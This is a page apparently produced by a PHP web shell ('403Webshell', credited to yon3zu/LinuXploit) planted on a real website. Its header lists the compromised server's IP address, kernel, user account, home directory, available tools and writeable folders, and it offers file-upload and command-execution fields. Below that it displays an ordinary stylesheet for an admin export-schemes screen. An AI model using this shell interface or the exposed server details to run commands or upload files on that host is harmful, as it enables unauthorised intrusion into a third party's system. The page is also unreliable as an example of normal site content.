403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/admin/styles/legacy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/admin/styles/legacy/export_schemes.css
/* ++++++++++++++++++++++++++++++++   Global Module CSS   ++++++++++++++++++++++++++++++++ */
a img {
    border: 0;
}

form {
    margin: 0;
}

.lightbox_header .lightbox_headline {
    margin-left: 7px;
}

.lightbox_package .lightbox_header .lightbox_close_button {
    margin-right: 7px;
    display: none;
}

.lightbox_package .lightbox_footer {
    display: none !important;
}

.lightbox_package .lightbox_wrapper {
    padding: 0px !important;
}

.lightbox_package .lightbox_content_container {
    padding: 0px 7px !important;
    width: auto !important;
}

/* ++++++++++++++++++++++++++++++++   Overview   ++++++++++++++++++++++++++++++++ */

#export_overview .export_tab_headline {
    text-decoration: none;
    font-size: 11px;
    font-family: Verdana, sans-serif;
    color: #787878;
    background: #E0E0E0;
    border-top: 1px solid #CCCCCC;
    border-left: 1px solid #CCCCCC;
    border-right: 1px solid #CCCCCC;
    -webkit-border-top-left-radius: 5px;
    -webkit-border-top-right-radius: 5px;
    -moz-border-radius-topleft: 5px;
    -moz-border-radius-topright: 5px;
    border-top-left-radius: 5px;
    border-top-right-radius: 5px;
    height: 28px;
    line-height: 28px;
    padding: 0 30px;
    float: left;
    z-index: 1000;
    margin-right: -1px;
    outline: 0;
}

#export_overview .export_tab_headline.active {
    z-index: 2000;
    color: #444;
    background: #fefefe; /* Old browsers */
    /* IE9 SVG, needs conditional override of 'filter' to 'none' */
    background: url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8c3ZnIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgdmlld0JveD0iMCAwIDEgMSIgcHJlc2VydmVBc3BlY3RSYXRpbz0ibm9uZSI+CiAgPGxpbmVhckdyYWRpZW50IGlkPSJncmFkLXVjZ2ctZ2VuZXJhdGVkIiBncmFkaWVudFVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgeDE9IjAlIiB5MT0iMCUiIHgyPSIwJSIgeTI9IjEwMCUiPgogICAgPHN0b3Agb2Zmc2V0PSIwJSIgc3RvcC1jb2xvcj0iI2ZlZmVmZSIgc3RvcC1vcGFjaXR5PSIxIi8+CiAgICA8c3RvcCBvZmZzZXQ9IjEwMCUiIHN0b3AtY29sb3I9IiNlZmVmZWYiIHN0b3Atb3BhY2l0eT0iMSIvPgogIDwvbGluZWFyR3JhZGllbnQ+CiAgPHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgZmlsbD0idXJsKCNncmFkLXVjZ2ctZ2VuZXJhdGVkKSIgLz4KPC9zdmc+);
    background: -moz-linear-gradient(top, #fefefe 0%, #efefef 100%); /* FF3.6+ */
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #fefefe), color-stop(100%, #efefef)); /* Chrome,Safari4+ */
    background: -webkit-linear-gradient(top, #fefefe 0%, #efefef 100%); /* Chrome10+,Safari5.1+ */
    background: -o-linear-gradient(top, #fefefe 0%, #efefef 100%); /* Opera 11.10+ */
    background: -ms-linear-gradient(top, #fefefe 0%, #efefef 100%); /* IE10+ */
    background: linear-gradient(to bottom, #fefefe 0%, #efefef 100%); /* W3C */
    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fefefe', endColorstr='#efefef', GradientType=0); /* IE6-8 */
    outline: 0;
}

#export_overview #export_tab_content_container {
    padding: 5px 5px 0 5px;
    border-top: 1px solid #CCC;
    background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#CCC), to(transparent));
    background-image: -webkit-linear-gradient(#CCC, transparent);
    background-image: -moz-linear-gradient(#CCC, transparent), -moz-linear-gradient(#CCC, transparent);
    background-image: -o-linear-gradient(#CCC, transparent), -o-linear-gradient(#CCC, transparent);
    background-image: linear-gradient(#CCC, transparent), linear-gradient(#CCC, transparent);
    -moz-background-size: 1px 100%;
    background-size: 1px 100%;
    background-position: 0 0, 100% 0;
    background-repeat: no-repeat;
}

/* ++++++++++++++++++++++++++++++++   Import Container   ++++++++++++++++++++++++++++++++ */

#import_container {
    width: 600px;
    color: #666;
    font-family: Verdana, sans-serif;
}

#import_container #upload_import_file {
    width: 390px;
}

/* ++++++++++++++++++++++++++++++++   Scheme Overview   ++++++++++++++++++++++++++++++++ */

.export_scheme_overview {
    position: relative;
}

.export_scheme_overview .headline_container .scheme_headline {
    background-color: #717171;
    float: left;
    color: #FFF;
    height: 31px;
    line-height: 31px;
    font-size: 12px;
    font-weight: bold;
    font-family: Verdana, sans-serif;
    padding: 0 0 0 20px;
}

.export_scheme_overview .headline_container .scheme_name {
    width: 245px;
    background-image: url('../../images/legacy/export_schemes/overview_headline_delimiter.png');
    background-repeat: no-repeat;
    background-position: top right;
    -webkit-border-top-left-radius: 5px;
    -moz-border-radius-topleft: 5px;
    border-top-left-radius: 5px;
}

.export_scheme_overview .headline_container .scheme_filename {
    width: 260px;
    background-image: url('../../images/legacy/export_schemes/overview_headline_delimiter.png');
    background-repeat: no-repeat;
    background-position: top right;
}

.export_scheme_overview .headline_container .scheme_cronjob_status {
    width: 80px;
    background-image: url('../../images/legacy/export_schemes/overview_headline_delimiter.png');
    background-repeat: no-repeat;
    background-position: top right;
}

.export_scheme_overview .headline_container .scheme_last_export {
    width: 387px;
    -webkit-border-top-right-radius: 5px;
    -moz-border-radius-topright: 5px;
    border-top-right-radius: 5px;
}

.export_scheme_overview .export_scheme_container {
    border: 1px solid #B4B9BD;
    border-top: 0px;
    color: #5B666A;
    height: 31px;
    line-height: 31px;
    width: 972px;
}

.export_scheme_overview .export_scheme_container:nth-child(even) {
    background-color: #EFEFEF;
}

.export_scheme_overview .export_scheme_container:nth-child(odd) {
    background-color: #FFF;
}

.export_scheme_overview .export_scheme_container .scheme_col {
    float: left;
    padding: 0 0 0 20px;
    height: 31px;
    line-height: 31px;
    font-size: 11px;
    font-family: Arial, sans-serif;
}

.export_scheme_overview .export_scheme_container .scheme_name {
    width: 243px;
    border-right: 1px solid #B2B2B2;
    font-weight: bold;
    white-space: nowrap;
    overflow: hidden;
}

.export_scheme_overview .export_scheme_container .scheme_filename {
    width: 259px;
    border-right: 1px solid #B2B2B2;
    white-space: nowrap;
    overflow: hidden;
}

.export_scheme_overview .export_scheme_container .scheme_filename a {
    color: #5B666A;
}

.export_scheme_overview .export_scheme_container .scheme_filename a.no_file {
    cursor: default;
    text-decoration: none;
    color: #BBB;
}

.export_scheme_overview .export_scheme_container .scheme_cronjob_status {
    width: 79px;
    border-right: 1px solid #B2B2B2;
    white-space: nowrap;
    overflow: hidden;
}

.export_scheme_overview .export_scheme_container .scheme_cronjob_status .cronjob_status_icon {
    display: block;
    width: 16px;
    height: 16px;
    background-repeat: no-repeat;
    background-position: center 16px;
    margin: 8px 0 0 19px;
    background-image: url(../../images/legacy/export_schemes/icon_cronjob_status.png);
}

.export_scheme_overview .export_scheme_container .scheme_cronjob_status .cronjob_status_icon.running {
    background-position: center 0px;
}

.export_scheme_overview .export_scheme_container .scheme_cronjob_status .cronjob_status_icon.pending {
    background-position: center -16px;
}

.export_scheme_overview .export_scheme_container .scheme_cronjob_status .cronjob_status_icon.queueing {
    background-position: center -32px;
}

.export_scheme_overview .export_scheme_container .scheme_cronjob_status .cronjob_status_icon.inactive {
    opacity: 0.3;
    filter: Alpha(opacity=30);
}

.export_scheme_overview .export_scheme_container .scheme_last_export {
    width: 372px;
}

.export_scheme_overview .export_scheme_container .scheme_last_export_date {
    float: left;
}

.export_scheme_overview .export_scheme_container .scheme_buttons {
    float: right;
}

.export_scheme_overview .export_scheme_container .scheme_buttons a {
    float: left;
    display: block;
    margin: 7px 0 0 10px;
}

.export_scheme_overview .export_scheme_container .scheme_buttons a.disabled {
    float: left;
    display: block;
    margin: 7px 0 0 10px;
    opacity: 0.3;
}

.export_scheme_overview .export_scheme_container .scheme_buttons a.active {
    cursor: default;
    opacity: 0.3;
    filter: Alpha(opacity=30);
}

/* ++++++++++++++++++++++++++++++++   Scheme Export (Lightbox)   ++++++++++++++++++++++++++++++++ */

.export_scheme_export .export_progress_bar {
    display: block;
    height: 10px;
    width: 250px;
    background: #272C32;
    margin: 0 auto;
    border: 1px solid #272C32;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    border-radius: 5px;
}

.export_scheme_export .export_progress_marker {
    display: block;
    height: 10px;
    width: 1%;
    background: url('../../images/legacy/export_schemes/export_progress_marker.png') repeat-x;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    border-radius: 5px;
}

.export_scheme_export .export_progress_text {
    font-size: 10px;
    color: #989898;
}

.export_scheme_export .export_message {
    font-weight: bold;
    min-height: 30px;
    line-height: 15px;
}

/* ++++++++++++++++++++++++++++++++   Scheme Details (Lightbox)   ++++++++++++++++++++++++++++++++ */

.export_scheme_details {
    overflow: auto;
    overflow-x: hidden;
}

form#export_scheme_details_form div.export_scheme_field_container_wrapper td {
    padding: 0;
}

form#export_scheme_details_form div.export_scheme_field_container_wrapper td .field_column_headline {
    line-height: 3;
}

.export_scheme_details .export_scheme_details_navigation {
    height: 30px;
    line-height: 30px;
    background: #454545;
    -webkit-border-radius: 3px;
    -moz-border-radius: 3px;
    border-radius: 3px;
    margin-bottom: 10px;
}

.export_scheme_details .export_scheme_details_navigation a {
    padding: 0px 20px;
    height: 30px;
    display: block;
    float: left;
    color: #fff;
    border-right: 1px solid #fff;
    font-family: Verdana, sans-serif;
    font-size: 11px;
    font-weight: bold;
    text-align: center;
}

.export_scheme_details .export_scheme_details_navigation .profile_name {
    padding: 0px 20px;
    height: 30px;
    display: block;
    float: right;
    color: #fff;
    font-family: Verdana, sans-serif;
    font-size: 11px;
    font-weight: bold;
}

.export_scheme_details .export_scheme_details_content {
    position: relative;
}

.export_scheme_details .content_headline {
    display: block;
    height: 28px;
    line-height: 28px;
    font-weight: bold;
    font-size: 13px;
    margin-bottom: 10px;
    color: #454545;
    float: left;
}

.export_scheme_details #properties .field_edit_container {
    display: none;
}

/* ++++++++++++++++++++++++++++++++   Scheme Configuration (Lightbox)   ++++++++++++++++++++++++++++++++ */

.export_scheme_configuration {
    width: 900px;
    margin: 0 auto;
}

.export_scheme_configuration .export_path {
    font-size: 11px;
    color: #777;
}

.export_scheme_configuration .conf_cronjob_time label {
    width: auto;
    margin-left: 3px;
    margin-right: 15px;
    float: left;
}

.export_scheme_configuration .conf_cronjob_time .cronjob_label {
    width: 145px;
    margin: 0;
}

.export_scheme_configuration .conf_cronjob_time select {
    width: 35%;
}

.export_scheme_configuration .col_2_2 {
    width: 60%;
}

/* ++++++++++++++++++++++++++++++++   Scheme Fields (Lightbox)   ++++++++++++++++++++++++++++++++ */

.export_scheme_fields .export_scheme_fields_wrapper {
    text-align: left;
}

.export_scheme_fields .button_container {
    margin: 0 0 10px 0;
    width: 340px;
}

.export_scheme_fields .export_scheme_field_container_wrapper {
    margin-left: 16px;
    width: 895px;
    height: 383px;
    overflow: auto;
}

.export_scheme_fields .export_scheme_field_container_wrapper table {
    position: relative;
}

.export_scheme_fields .fields_headline {
    float: left;
    width: 100px;
    margin-left: 20px;
}

.export_scheme_fields .field_container {
    height: 360px;
    display: block;
}

.export_scheme_fields .field_column {
    display: block;
    width: 36px;
    height: 360px;
    background: url('../../images/legacy/export_schemes/bg_field_column.jpg') repeat-y;
    position: relative;
    overflow: hidden;
}

.export_scheme_fields .field_column:hover {
    background: url('../../images/legacy/export_schemes/bg_field_column_hover.jpg') repeat-y;
}

.export_scheme_fields .field_column_move,
.export_scheme_fields .field_column_delete {
    width: 23px;
    height: 23px;
    position: absolute;
    top: 9px;
    left: 6px;
    background: url('../../images/legacy/export_schemes/icon_column_move.png') repeat-y;
    cursor: pointer;
}

.export_scheme_fields div.field_column_move {
    cursor: move;
}

.export_scheme_fields .field_column_delete {
    top: 35px;
    background: none;
}

.export_scheme_fields .field_column_delete a {
    display: block;
    width: 23px;
    height: 23px;
    background: url('../../images/legacy/export_schemes/icon_column_delete.png') repeat-y;
}

.export_scheme_fields .field_column_move.active,
.export_scheme_fields .field_column_delete a.active {
    opacity: 0.15;
    filter: Alpha(opacity=15);
}

.export_scheme_fields .properties_column_headline,
.export_scheme_fields .field_column_headline {
    -webkit-transform: rotate(270deg);
    -moz-transform: rotate(270deg);
    -o-transform: rotate(270deg);
    -ms-transform: rotate(270deg);
    position: absolute;
    top: 137px;
    left: -137px;
    width: 310px;
    height: 36px;
    line-height: 36px;
    text-align: left;
    color: #fff;
    font-size: 12px;
    font-weight: bold;
    cursor: pointer;
    overflow: hidden;
}

.export_scheme_fields .properties_column_headline_button,
.export_scheme_fields .field_column_headline_button {
    position: relative;
    top: 65px;
    left: 0;
    width: 36px;
    height: 295px;
    display: block;
}

.export_scheme_fields .properties_column_headline_button a,
.export_scheme_fields .field_column_headline_button a {
    display: block;
    width: 100%;
    height: 100%;
}

.export_scheme_fields #field_edit_container {
    display: none;
}

.export_scheme_fields #properties_details,
.export_scheme_fields #field_details {
    width: 360px;
    height: 360px;
    background: #fff;
}

.export_scheme_fields .field_headline {
    font-weight: bold;
    font-size: 12px;
    padding: 0 0 20px 0;
    height: 16px;
}

.export_scheme_fields .field_variable_description {
    float: left;
    margin: 10px 0 0 0;
    display: block;
    width: 100%;
    height: 55px;
    overflow: hidden;
}

#properties_details .col_1 {
    margin: 0 10px;
    width: 340px;
}

#properties_details .row {
    margin: 0;
}

#properties_details .row label {
    width: auto;
}

#properties_details .col_1 select {
    width: 338px;
    overflow: auto;
    height: 100px;
}

#properties_details .button_container {
    margin-top: 20px;
}

/* ++++++++++++++++++++++++++++++++   Scheme Collective Fields (Lightbox)   ++++++++++++++++++++++++++++++++ */

#export_scheme_collective_fields {
    width: 900px;
    margin: 0 auto;
}

#export_scheme_collective_fields th {
    vertical-align: top;
}

#export_scheme_collective_fields th.collective_field_name {
    width: 160px;
}

#export_scheme_collective_fields th.collective_field_source {
    width: 460px;
}

#export_scheme_collective_fields th.collective_field_default {
    width: 160px;
}

#export_scheme_collective_fields th.collective_field_sources {
    width: 120px;
}

#export_scheme_collective_fields th.collective_field_delete {
    width: 20px;
}

#export_scheme_collective_fields .collective_field_delete img {
    cursor: pointer;
}

#export_scheme_collective_fields .text_input {
    width: 99%;
}

#export_scheme_collective_fields .centered {
    text-align: center;
}

#export_scheme_collective_fields .form_pattern {
    display: none;
}

/* ++++++++++++++++++++++++++++++++   Scheme Preview (Lightbox)   ++++++++++++++++++++++++++++++++ */

.export_scheme_preview {
    width: 100%;
    height: 205px;
    padding: 0 0 10px 0;
    position: relative;
}

.export_scheme_preview img {
    position: absolute;
    top: 50%;
    left: 50%;
    margin-top: -15px;
    margin-left: -15px;
}

.export_scheme_preview .preview_headline {
    display: block;
    height: 28px;
    line-height: 24px;
    font-weight: bold;
    font-size: 13px;
    color: #454545;
    margin: 0 0 0 5px;
    float: left;
}

.export_scheme_preview table {
    background: #99A2A7;
    -webkit-border-top-left-radius: 5px;
    -moz-border-radius-topleft: 5px;
    border-top-left-radius: 5px;
    -webkit-border-top-right-radius: 5px;
    -moz-border-radius-topright: 5px;
    border-top-right-radius: 5px;
    position: relative;
}

.export_scheme_preview table th,
.export_scheme_preview table td {
    padding: 0 20px;
    height: 25px;
    line-height: 25px;
    background: #fff;
    white-space: nowrap;
    font-size: 11px;
}

.export_scheme_preview table th {
    font-weight: bold;
    background: #BAB8B9;
    color: #333333;
}

.export_scheme_preview table th.active {
    font-weight: bold;
    background: #D2D0D1;
    color: #323232;
}

.export_scheme_preview table td {
    color: #5B666A;
}

.export_scheme_preview table td.active {
    color: #000;
}

.cronjob_url_container {
    display: none;
    font-weight: bold;
    font-family: Arial, sans-serif;
    font-size: 11px;
    color: #5B666A;
    margin-top: 20px;
}

.cronjob_url_container input {
    width: 800px;
}

Youez - 2016 - github.com/yon3zu
LinuXploit